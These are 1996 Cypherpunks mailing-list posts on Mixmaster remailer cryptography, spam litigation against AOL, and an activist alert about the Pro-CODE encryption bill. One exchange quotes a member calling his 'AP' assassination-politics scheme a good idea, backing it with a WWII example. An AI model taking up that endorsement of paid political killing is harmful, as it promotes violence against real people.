were not doing rekeying, it would make sense to put the public DH
parameters in the key block, as it would remove the need to negotiate
these parameters, and simplify the protocol.  As you're doing
rekeying, putting the parameters in the public key block makes a less
orthogonal protocol, adds nothing, and has the negative effect of
breaking compatibility with previous public key blocks.  In short for
a rekeying protocol I agree :-)

> >[bigger keys!]
> 
> Call me paranoid. After asking and reading around I decided I wanted to
> cover my bases. It looked like, in the future, it might be easier to break
> with small generators. 

Fair enough.

> This is not a critical decision though. I too would have liked it
> longer, but using RSAREF I am limited. 

I suspected RSAs weird license might be the problem.  (Given the
situation with PGP 2.x, I presume that the license does not permit you
to increase the max arithmetic precision.)

> That is one of the reasons I have each remailer creat its own DH
> modulus, and allow it to change it periodically.

Each remailer with it's own prime doesn't buy you a whole lot of
entropy because there aren't many mixmaster remailers, 4 bits
currently?.  The entropy from having rekeying every day instead of say
every year, another 9 bits, 13 bits tops?  I'm not sure what the
precise entropy increase is from going to 1024 to 4096, but it's got
to be many orders of magnitude better than 13 bits.

I'd say junk RSAREF for the DH operations, use one of the other libs.
(You can do this for DH, without violating patents, right?  But not
for RSA, so I guess if you care about the patent/license agreement
mess, you've got to use RSAREF for RSA signatures at least).  Or maybe
you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk
encryption, and presumably will have less restrictive key sizes.

So as well as having bigger signing keys, for the sake of paranoia
(it's contagious), as you were saying, I guess you may gain some
security by not having a common modulus, and making the protocol allow
re-keying.

If you used a different password for RSA and DH keys, and your machine
is compromised, you can sign a new DH key with RSA, and use El Gamal
signatures with the DH key normally.  Hows that for paranoid :-)

(Or another temporary RSA key, and RSA sigs, rather than El Gamal
sigs, whatever.  You sign by proxy, that is the receiver mixmaster
gets a the temporary key signed by the long term RSA key, checks the
signature on the temporary key, and then checks the signature made by
the temporary key on the object in question).

Greatly reduces the risk of having the password in the binary.  You'd
need to manually type the RSA keys password to rekey, or if you were
real paranoid, you could keep the RSA key on your laptop, and copy the
new signed DH public key on to the remailer.  Do this once a month, or
as often as you wish.

This is a similar approach to that taken by people who have a huge
signing only PGP key, which they are careful to keep only on machines
they physically control, and have smaller keys which they use on
multi-user systems.

This also formalizes the situation where remailers have been
compromised, or suffered disk crashes.  The operator says, "sorry
folks new type2 key for mixmaster@xyz.org", and if you're lucky signs
his post, and also his post of the original key, so that you know it's
not a hijacker, and if you're even more lucky, the user was around
when the first post was made, or searches through the archives for it,
and checks that the sigs show a persistent identity for the operator.
An improvement right?  The remailers keep both their signing keys, and
their temporary signing keys available by request, the signing key
should not change through the remailers life-time.

> >A common modulus may offer a fatter target for attack (for some
> >precomputation attacks), but with large enough keys this probably
> >isn't that bad, as there aren't that many mixmasters anyway.
> >
> >With a common modulus there is DH key negotiation needed, just include
> >it with the source.
> 
> You have spelled out why I like having each remailer use its own modulus.

yeah, ok, I agree no common modulus.  And rekeying.

> >a) include the DH key signed by the RSA key in the remailers public key
> >   (may break backwards compatibility with existing versions of
> >   mixmaster)
> >
> >b) send the DH public key at the start of each session
> >
> >c) send the DH public key on request
> 
> I chose C. The in protocol I developed the sending remailer (A) sends a
> hash of the DH modulus to the receiving remailer (B). If B has it, they use
> it. If not, A sends it. I use the modulus from A because it has the stake
> in privacy. B will take messages from anyone, but A wants to know the
> messages it has goes to the correct other remailer B.

sounds fine.

Also, you might want to migrate to SHA1 in place of MD5, at some
point.  Or to one of those megahashes like

	SHA1(MD5(x))||MD5(SHA1(x))

Also mixmaster has capabilities like type 1 remailers right?  If so
you would presumably add a capability indicating that the remailer
supports direct socket delivery.  And another capability for forward
secrecy (the other thread "non-interactive forward secrecy" discusses
ways to retro-fit a less interactive forward secrecy mechanism into
email delivered mixmaster packets).

The socket capability presumably would be useful to know that it is
likely to react more quickly.  Forward secrecy is obviously nice to
know about for other reasons.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Tue, 10 Sep 1996 09:42:06 +0800
To: "Wayne H. Allen" <whallen@capitalnet.com>
Subject: Re: Purpose of this forum
In-Reply-To: <199609081513.LAA14900@ginger.capitalnet.com>
Message-ID: <323382E9.26BD@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


> Wayne H. Allen wrote: 
> At 03:03 AM 9/8/96 +0000, attila wrote:
> =Dear Whoever,
> cypherpunks are *not* crackers; this is a crytographic
> and political issues relating to cryptography mailing list.
> 
> Well maybe, political issues galore certainly, but very very little
> to do with cryptography. I mean what does TWA 800 have to do with this
> list. I mean lets be completely honest here, whatever the original
> purpose of the list was for its been allowed to shift away from its
> intended purpose considerably.
> Wayne H.Allen
> whallen@capitalnet.com
> Pgp key at www.capitalnet.com/~whallen

My two cents worth: Since the purpose of the forum is to explore issues 
affecting personal cryptography and privacy, etc., TWA 800 as an excuse 
to crank out privacy-depletion laws is certainly of concern here, though 
one could argue for sub-forums to cover related issues.

Reminds me of research into Simpson affair - can you really understand 
what such a case is all about without "shaking the bushes" and "raking 
the leaves" quite a bit? So much essential data is avoided by both sides 
who have pre-determined agendas, that we're left with broken threads of 
inquiry everywhere. One could argue that Simpson is inconsequential, 
until one considers changes to the law, particularly to citizen juries.

Perhaps the ideal would be a top-level forum for crypto-specific issues, 
then sub-forums for specific related topics, and a catch-all sub-forum 
for related messages not fitting into the specific sub-forums.

I personally don't like the idea of filters; I'd prefer a sieve instead.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 9 Sep 1996 10:52:44 +0800
To: declan@eff.org (Declan McCullagh)
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <Pine.SUN.3.91.960908123138.821J-100000@eff.org>
Message-ID: <199609082348.TAA04495@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text


> 
> The judge did mention "status quo" in his opinion. I would hope that 
> "status quo" would mean the ability of ISPs to offer and enforce whatever 
> contracts they want -- including banning incoming spam -- without the 
> intervention of the government. Unless, of course, the ISP breaks the 
> contract, but in that case the plaintiffs should be the customers, not 
> the spammer.

Aren't spammers customers, by definition? If so, they have just as much
right to bring suit as any other customer. Less moral justification, yes,
but an equal standing in the law's eyes.

--
I let go of the law, and people become honest / I let go of economics, and
people become prosperous / I let go of religion, and people become serene /
I let go of all desire for the common good, and the good becomes common as
grass.   .oOo.    [Tao Te Ching, Chapter 57, Stephen Mitchell translation]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 9 Sep 1996 10:58:46 +0800
To: jfricker@vertexgroup.com (John F. Fricker)
Subject: [PARANOID NOISE] Satellites flying formation?
Message-ID: <9609082355.AA11764@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Sep 96 at 12:16, John F. Fricker wrote:


> >I don't know. I would presume so. I only guess that it was a 3-4-5
> >formation. But it does make some constants easy! <g> 


> Maybe we could each watch for these formations and keep a log of
> observations. I've done a little searching for more information but
> I find nothing easy. Perhaps one of my hard core skywatcher friends
> would know something as well.

I'll try to link with my old stargazers friends and ask questions 
around.  If you get something new, write.

Cheers and good luck!

jfa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 9 Sep 1996 11:55:26 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Shit from Juno
In-Reply-To: <Pine.BSF.3.91.960908185022.331A-100000@mcfeely.bsfs.org>
Message-ID: <6DRyTD58w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rabid Wombat <wombat@mcfeely.bsfs.org> writes:

>
> Complaints about spamming and cross-posting probably won't get you far,
> either. On-Net spamvertizing seems to be their source of revenue. Perhaps
> shaw.net needs to be contacted instead. It's either that, or give Floyd
> and Richard a nickle to go watch batman instead of playing with the computer.

FWIW, Juno is the project of D.E.Shaw, a very obnoxious investment bank
here in NYC. It's ironic that the sysadmin at D.E.Shaw, Mark Moraes, is
the moderator of some news.newbies? Usenet newsgroup.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Kucharo" <sophi@best.com>
Date: Mon, 9 Sep 1996 15:49:12 +0800
To: <tcmay@got.net>
Subject: Re: Conservation Laws, Money, Engines, and Ontology
Message-ID: <199609090401.VAA26172@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


  One thing that occurs here.  I imagine a scenario where you have a
"share" of resources on a system(and ISP for example).  You're metered as
to how much you can post or store.  Actually as it is now posting is
regulated through extra payments per meg above the limit.  Spam is being
somewhat regulated by Terms of Service type things, but my point is what is
to prevent pooling resources among several system to achive the same Spam
pursuits some have.  Say for example that an individual gets several
accounts to balance the load at thier point.  The Usenet for example has no
 "choke point".  How could ISP's apply conservation here?  If you limit the
amount of traffic you still aren't holding back the flow of "spam".
  Here's where reputations could come in.  You cound't open a new account
anywhere without a good "reputation".  This could aid in balancing the load
of certain people.

???????????????????????????????????????
Greg Kucharo
sophi@best.com
"Eppur si moeve" -Galileo
???????????????????????????????????????




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 9 Sep 1996 15:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: Browne and foreign tyrants
Message-ID: <v02130500ae58d8499916@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


> jim bell <jimbell@pacifier.com> wrote:
>
>And this was a real shame.  Over 30 million people died in WWII, directly or
>indirectly.  We knew that Hitler was going to be a problem well before 1936.
> Think how many could have been saved...
>
>If anything, WWII is excellent proof that AP is a good idea.  Stauffenberg
>was the German who bombed Hitler's meeting in 1944 but failed to kill him.
>Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a
>recent "60 Minutes" episode related how hundreds of people knew about this
>plot.

In the late 30's Bugsy Seigel was in Europe visiting a friend (a countess,
I believe).  At one of her parties Hitler and a few henchmen also showed
up.  When Buggsy found out who they were he went to get his gun and finish
them off.  It was only on the pleading of his friend, that it would set off
an international incident and could ruin her, that Buggsy relented.  Too
bad he wasn't more of a hot head.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 9 Sep 1996 14:29:49 +0800
To: "ravage@einstein.ssz.com>
Subject: Re: talker (fwd)
Message-ID: <19960909041342953.AAA192@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Sep 1996 16:41:06 -0500 (CDT), Jim Choate wrote:

>> Date: Sun, 8 Sep 1996 13:23:06 -0700 (PDT)
>> From: "Z.B." <zachb@netcom.com>
>> Subject: Re: talker
>> 
>> I just checked www.juno.com to see what kind of system they have, and it 
>> appears that it is a free email service.  No charges at all.  No wonder 
>> we get so many idiots from there - free mail and they probably don't 
>> bother to verify the people they give service to, either.
>
>Well we know at least one cpunk who is anti-anonymity....

Not necessarily.  I think he's just saying that if it's free and anonymous you
have no quality control.  Even a token fee keeps out an amazing number of
loons...

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@infonex.com>
Date: Mon, 9 Sep 1996 14:44:03 +0800
To: Adam Back <mix-l@jpunix.com
Subject: Re: forward secrecy in mixmaster
In-Reply-To: <v03007803ae5817d08aba@[206.170.115.3]>
Message-ID: <v03007808ae59495b4215@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:29 AM -0700 9/8/96, Adam Back wrote:
>Lance Cottrell <loki@infonex.com> writes on several lists:

>I suspected RSAs weird license might be the problem.  (Given the
>situation with PGP 2.x, I presume that the license does not permit you
>to increase the max arithmetic precision.)

Our options will open up alot when the patent expires next year.

>> That is one of the reasons I have each remailer creat its own DH
>> modulus, and allow it to change it periodically.
>
>Each remailer with it's own prime doesn't buy you a whole lot of
>entropy because there aren't many mixmaster remailers, 4 bits
>currently?.  The entropy from having rekeying every day instead of say
>every year, another 9 bits, 13 bits tops?  I'm not sure what the
>precise entropy increase is from going to 1024 to 4096, but it's got
>to be many orders of magnitude better than 13 bits.
>
>I'd say junk RSAREF for the DH operations, use one of the other libs.
>(You can do this for DH, without violating patents, right?  But not
>for RSA, so I guess if you care about the patent/license agreement
>mess, you've got to use RSAREF for RSA signatures at least).  Or maybe
>you could just wait for PGP 3.0 which uses El Gamal, for sigs and pk
>encryption, and presumably will have less restrictive key sizes.

I agree it does not make much difference mathematically, but one DH modulus
always makes me uneasy. DH is still patented though. I think I will continue
to use RSAREF, but compose the standard so the protocol supports unlimited
key sizes.

>So as well as having bigger signing keys, for the sake of paranoia
>(it's contagious), as you were saying, I guess you may gain some
>security by not having a common modulus, and making the protocol allow
>re-keying.
>
>If you used a different password for RSA and DH keys, and your machine
>is compromised, you can sign a new DH key with RSA, and use El Gamal
>signatures with the DH key normally.  Hows that for paranoid :-)
>
>(Or another temporary RSA key, and RSA sigs, rather than El Gamal
>sigs, whatever.  You sign by proxy, that is the receiver mixmaster
>gets a the temporary key signed by the long term RSA key, checks the
>signature on the temporary key, and then checks the signature made by
>the temporary key on the object in question).
>
>Greatly reduces the risk of having the password in the binary.  You'd
>need to manually type the RSA keys password to rekey, or if you were
>real paranoid, you could keep the RSA key on your laptop, and copy the
>new signed DH public key on to the remailer.  Do this once a month, or
>as often as you wish.
>
>This is a similar approach to that taken by people who have a huge
>signing only PGP key, which they are careful to keep only on machines
>they physically control, and have smaller keys which they use on
>multi-user systems.

For now I think we might just suggest that the operator keep a big PGP key
to sign new key releases with. Key management is a whole nother thorny
issue. I would love to see that whole part of Mixmaster reworked. Some deep
thought should go into managing and distributing keys (it was almost an
afterthought in my design).

<SNIP>
>> >a) include the DH key signed by the RSA key in the remailers public key
>> >   (may break backwards compatibility with existing versions of
>> >   mixmaster)
>> >
>> >b) send the DH public key at the start of each session
>> >
>> >c) send the DH public key on request
>>
>> I chose C. The in protocol I developed the sending remailer (A) sends a
>> hash of the DH modulus to the receiving remailer (B). If B has it, they use
>> it. If not, A sends it. I use the modulus from A because it has the stake
>> in privacy. B will take messages from anyone, but A wants to know the
>> messages it has goes to the correct other remailer B.
>
>sounds fine.
>
>Also, you might want to migrate to SHA1 in place of MD5, at some
>point.  Or to one of those megahashes like
>
>	SHA1(MD5(x))||MD5(SHA1(x))

It is something to consider. Right now the software is not that flexible,
but it should be in the next major revision. I too would like to move from
total MD5 dependence.

>Also mixmaster has capabilities like type 1 remailers right?  If so
>you would presumably add a capability indicating that the remailer
>supports direct socket delivery.  And another capability for forward
>secrecy (the other thread "non-interactive forward secrecy" discusses
>ways to retro-fit a less interactive forward secrecy mechanism into
>email delivered mixmaster packets).

Mixmaster recognizes type 1 messages, and passes them to a type 1 remailer.

>The socket capability presumably would be useful to know that it is
>likely to react more quickly.  Forward secrecy is obviously nice to
>know about for other reasons.
>
>Adam

Socket support for type 1 is more complicated. The known RSA key is now the
PGP key which encrypted the message. It is going to be a lot more
complicated to go in a get all the info needed using PGP. Given a PGP
library it could be done within Mixmaster, but it seems outside the scope
of the program. My personal feeling is that as Mixmaster improves and gets
more widely ported, type 1 should phase out.

	-Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will rodger <rodger@interramp.com>
Date: Mon, 9 Sep 1996 13:59:54 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: RE: Court challenge to AOL junk-mail blocks
Message-ID: <199609090152.VAA12651@interramp.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Declan, in reply to questions about Cyber Promo's statue re: AOL wisely wrote:

	>>No. A customer buys service from AOL and in doing so signs a contract
	>>with the company. AOL and the customer each has certain rights and
	>>obligations spelled out in the contract.
	>>
	>>I confess I don't know if AOL's contract allows them to block spam. But
	>>in any case, spammers are not customers.
	>>
	>>-Declan
	>>

Cyber Promotions of course is not now a client of AOL, which is one the company's defenses against AOL. Although AOL attorneys don't make the connection outright, their filings seem to imply that once one is an AOL customer, he's always subject to their rules. Wallace, it seems, had an account or two with AOL and was spamming during that time in violation of terms of service. They soon bumped him from the service.

Now that he's not a subscriber, they claim Wallace is still violating terms of service. How that's relevant to a former subscriber is far from clear. Wallace's attorneys, of course say it isn't relevant at all.

No doubt about it; this one is going to be a lot of fun.

Will Rodger
Washington Bureau Chief
Inter@ctive Week

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQEVAgUBMjN30UcByjT5n+LZAQEO0QgAhKgbD1ljZfDoZR/J9PF9wQFgZxoSM8DZ
SfhfPMNDnBDqx1dq2qjxbxKC0uqP5AQq76ZPr+MVexvdI9ec+8W9DFW/O8ujOsJT
yU/vg0XnWC3kNeQVW9OpTjlNZrlm37TRM5Fl/JeBxrFlws1aS1fG57Xnq2YYEJJ2
hrn20q9szJiRLnFJ0hSfjhsYkLir7qErhqMMOu0kw1HAqfA7kAzmoxD4ukaeqqL9
Hkqqf2E59xtOSvmMRtqgtGhUijiMeuO1K/wCITp0SS6U4XieeHrV5jpfY3RU6c2s
g7OBHkMq6fjzWO29WJO67imOeb45bsZMM3vvqKlH5lxXHR+g1DjUnw==
=Iatg
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Mon, 9 Sep 1996 15:13:41 +0800
To: Will rodger <rodger@interramp.com>
Subject: RE: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609090152.VAA12651@interramp.com>
Message-ID: <Pine.SUN.3.91.960908215200.17359E-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Will, for the clarification. I agree that this will be a *very* 
interesting case and a lot of fun to watch. :)

I should clarify one thing I said earlier in which I mentioned the court's
"opinion." That seems to imply something lengthy. In fact, it was not. The
order was a one-page TRO. 

-Declan



On Sun, 8 Sep 1996, Will rodger wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Declan, in reply to questions about Cyber Promo's statue re: AOL wisely wrote:
> 
> 	>>No. A customer buys service from AOL and in doing so signs a contract
> 	>>with the company. AOL and the customer each has certain rights and
> 	>>obligations spelled out in the contract.
> 	>>
> 	>>I confess I don't know if AOL's contract allows them to block spam. But
> 	>>in any case, spammers are not customers.
> 	>>
> 	>>-Declan
> 	>>
> 
> Cyber Promotions of course is not now a client of AOL, which is one the company's defenses against AOL. Although AOL attorneys don't make the connection outright, their filings seem to imply that once one is an AOL customer, he's always subject to their rules. Wallace, it seems, had an account or two with AOL and was spamming during that time in violation of terms of service. They soon bumped him from the service.
> 
> Now that he's not a subscriber, they claim Wallace is still violating terms of service. How that's relevant to a former subscriber is far from clear. Wallace's attorneys, of course say it isn't relevant at all.
> 
> No doubt about it; this one is going to be a lot of fun.
> 
> Will Rodger
> Washington Bureau Chief
> Inter@ctive Week
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.9
> 
> iQEVAgUBMjN30UcByjT5n+LZAQEO0QgAhKgbD1ljZfDoZR/J9PF9wQFgZxoSM8DZ
> SfhfPMNDnBDqx1dq2qjxbxKC0uqP5AQq76ZPr+MVexvdI9ec+8W9DFW/O8ujOsJT
> yU/vg0XnWC3kNeQVW9OpTjlNZrlm37TRM5Fl/JeBxrFlws1aS1fG57Xnq2YYEJJ2
> hrn20q9szJiRLnFJ0hSfjhsYkLir7qErhqMMOu0kw1HAqfA7kAzmoxD4ukaeqqL9
> Hkqqf2E59xtOSvmMRtqgtGhUijiMeuO1K/wCITp0SS6U4XieeHrV5jpfY3RU6c2s
> g7OBHkMq6fjzWO29WJO67imOeb45bsZMM3vvqKlH5lxXHR+g1DjUnw==
> =Iatg
> -----END PGP SIGNATURE-----
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Voters Telecommunications Watch <shabbir@vtw.org>
Date: Mon, 9 Sep 1996 17:33:46 +0800
To: cypherpunks@toad.com
Subject: ALERT: Call the Commerce committee to protect your privacy! (9/7/96)
Message-ID: <199609090211.WAA13794@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


========================================================================

       SENATE COMMERCE COMMITTEE SCHEDULED TO VOTE ON PRO-PRIVACY
       ENCRYPTION LEGISLATION (S.1726) ON THU SEPTEMBER 12, 1996

	        YOUR HELP IS NEEDED TO ENSURE PASSAGE
          CALL THE COMMERCE COMMITTEE (PHONE NUMBERS BELOW)

	               	   September 8, 1996

      Please widely redistribute this document with this banner intact
			until September 30, 1996

________________________________________________________________________
CONTENTS
	The Latest News
	What You Can Do Now
	Background / What To Expect This Week
	Description of S.1726, Pro-CODE Bill
	Chronology of Pro-Crypto Legislation
	For More Information / Supporting Organizations

________________________________________________________________________
THE LATEST NEWS

On Thursday September 12, the Senate Commerce Committee is set to vote
on legislation designed to enhance privacy and security on the Internet.
The bill, known as the "Promotion of Commerce Online in the Digital Era
(Pro-CODE) Act," (S. 1726) is the best hope yet for real reform of U.S.
encryption policy, and its passage by the Commerce Committee would signify
a critical step forward in the struggle for privacy and security in the
Information Age.

The bill faces significant opposition from the Clinton Administration,
who continues to cling to a cold-war era view of U.S. encryption policy.
IT IS ESSENTIAL THAT THE COMMERCE COMMITTEE HEAR FROM SUPPORTERS OF PRIVACY
AND SECURITY ON THE INTERNET. Please take a moment to contact the committee
by following the simple instructions below.

________________________________________________________________________
WHAT YOU CAN DO NOW

It's crucial that you call the Commerce committee members below and
urge them to pass S.1726 out of committee without amendments.  (This is
also known as a "clean" bill.)  Any opportunity for amendments (even if
they are good) opens us up to the possibility of hostile amendments
that could restrict the use of encryption even further than today's
abysmal state.  It could even prohibit the use of encryption without
Clipper Chip-like key 'escrow' technology, which includes built-in
surveillance and monitoring functionality.

1. Call/Fax the members of the Senate Commerce committee and urge
   them to pass S.1726 out of committee "cleanly".  Do not use email,
   as it is not likely to be looked at in time to make a difference
   for the markup on September 12th.

   Use the sample communique and directory listing below to make it a
   simple TWO MINUTE task.

2. Sign the petition to support strong encryption at
   http://www.crypto.com/petition/   !  Join other cyber-heroes as
   Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
   others who have also signed.

3. Between now and Wed. September 12, it is crucial that you call all
   these members of Congress.

      P ST Name and Address           Phone           Fax
      = == ========================   ==============  ==============
      D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
      D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
      D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
      D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
      D WV Rockefeller, John D.       1-202-224-6472  na
      D LA Breaux, John B.            1-202-224-4623  na
      D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
      D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
      D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
      D OR Wyden, Ron*                1-202-224-5244  1-202-228-2717

      R SD Pressler, Larry*            1-202-224-5842  1-202-224-1259
      R MT Burns, Conrad R.(*sponsor) 1-202-224-2644  1-202-224-8594
      R AK Stevens, Ted               1-202-224-3004  1-202-224-2354
      R AZ McCain, John               1-202-224-2235  1-202-224-2862
      R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
      R MS Lott, Trent*               1-202-224-6253  1-202-224-2262
      R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
      R ME Snowe, Olympia             1-202-224-5344  1-202-224-6853
      R MO Ashcroft, John*            1-202-224-6154  na
      R TN Frist, Bill                1-202-224-3344  1-202-224-8062
      R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834

	* supporter or cosponsor.  The bill also enjoys broad bi-partisan
	support from members not on the committee including Senators Leahy
	(D-VT) and Murray (D-WA).

4. Here is a sample conversation:

   SAMPLE PHONE CALL
	You:<ring ring>
	Sen:Hello, Senator Mojo's office!

	You:

SAY     I'm calling to urge the Senator to pass S.1726, the 
THIS-> 	Burns/Leahy/Pressler bill, S.1726 when the committee votes on
	it on Thursday.  It's critical to the future of privacy, security,
	and electronic commerce on the internet.

	Sen:Ok, thanks!<click>

   IF THEY SAY
	"The Senator has concerns about the bill",
   please answer,
   	"Please try to work these issues out as it moves to the Senate floor,
	 but passage out of committee will send an important signal to
	 the Administration."

5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM
   YOU.  Please tell us who you called, and how they sounded.  We'll be
   passing this information to folks in D.C. who can help apply pressure
   where needed.

 	$ Mail vtw@vtw.org
	Subject: I called so-and-so

	Hey, I called Sen. Mojo.  He sounded iffy, call in the
	reinforcements.
	^D

6. Forward this to your friends and colleagues in appropriate forums
   until the date of expiration at the top.  Forward a copy of this to
   your Internet Service Provider as well, and ask them to put the following
   text in their message of the day (motd), or on their WWW page:

	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

	The U.S. Senate will be voting on a proposal to encourage
	better security on the Internet on Thu Sep. 12th.  Your help is
	needed to call Congress.  See http://www.crypto.com/ for more
	details.

	ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT

________________________________________________________________________
BACKGROUND / WHAT TO EXPECT THIS WEEK

For the past 3 years, Cyber-Rights Activists, citizens, and industry
leaders have been working hard to reform US encryption policy.

Support has been building behind several legislative proposals this
year because they send a clear signal to the Administration about the
need for security and privacy in the Information Age.  The digital
revolution is currently being held hostage by the White House's Cold
War restrictions on privacy-enhancing encryption technology.

Now, with Congress less than a month away from adjournment, everyone
who supports encryption and privacy is working to see this bill leave
committee in order to send a clear message to the White House that they
are on the wrong side of the encryption issue.  Although this bill may
not become law this year, its passage out of committee will be a
landmark event that will clearly tell the White House that the
Congress, the public, and the computer industry care about security and
privacy, and need strong, reliable encryption technology in order to
make the Internet a viable platform for commerce, education, and
democracy.

Success for our side is not certain, and the next week is not without risks.
On September 12th, the Senate Commerce committee will hold a "markup",
where the bill is examined, voted on, and if there are enough votes,
passed out of committee.  Two things could happen:

	-the committee could pass the bill as written,
	-the committee could pass the bill with amendments.

Any amendments are not likely to be friendly, and in particular, quiet
sources have told privacy activists that the Clinton Administration has been
readying a legislative assault on your right to use encryption for several
weeks now.  A Clipper-like amendment could be attached to the bill if
our side does not have enough votes to block all amendments.

It is crucial that all netizens who consider privacy and security important
take a moment to call members of the Commerce Committee right now and
urge them to vote S.1726 out of committee without amendments.

________________________________________________________________________
DESCRIPTION OF S.1726, PRO-CODE BILL

Privacy-enhancing encryption technology is currently under heavy restrictions
kept in place by the White House.  Encryption that is currently allowed to
be exported is not sufficient to protect confidential information.  This
policy acquires an "Alice-in-Wonderland" quality when one realizes that  
strong encryption products are available abroad both for sale and for free
download off the Internet.

The Pro-CODE Act resolves to:

1.  Allow for the *unrestricted* export of "mass-market" or "public-domain"
    encryption programs, including such products as Pretty Good Privacy and
    popular World Wide Web browsers.

2.  Requires the Secretary of Commerce to allow the less restricted export
    of other encryption technologies if products of similar strength are
    generally available outside the United States, roughly up to DES
    strength.

3.  Prohibits the federal government from imposing mandatory key-escrow
    encryption policies on the domestic market and limiting the authority
    of the Secretary of Commerce to set standards for encryption products.

________________________________________________________________________
CHRONOLOGY OF PRO-CRYPTO LEGISLATION

9/12/96 (scheduled)
Senate Commerce committee will hold markup of S.1726 and hopefully pass it
out of committee with no amendments.

7/25/96: Full Senate Commerce committee holds positive hearings on S.1726.
FBI Director Louis Freeh testifies along with many cyber-luminaries.
Hearings are cybercast Internet Cyber-Rights activists with HotWired
and WWW.Crypto.Com.  You can see the photos, read the testimony, and
listen to the audio transcript at http://www.crypto.com/events/072596/

6/26/96: Senate subcommittee holds positive hearings on S.1726.  Hearings are
cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com.
You can see the photos, read the testimony, and listen to the audio
transcript at http://www.crypto.com/events/062696/

5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would
free public-domain encryption software (such as PGP) for export, free much
commercial encryption for export, and reduce the government's ability to
push Clipper proposals down the throats of an unwilling public.  Original
sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC),
Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR).

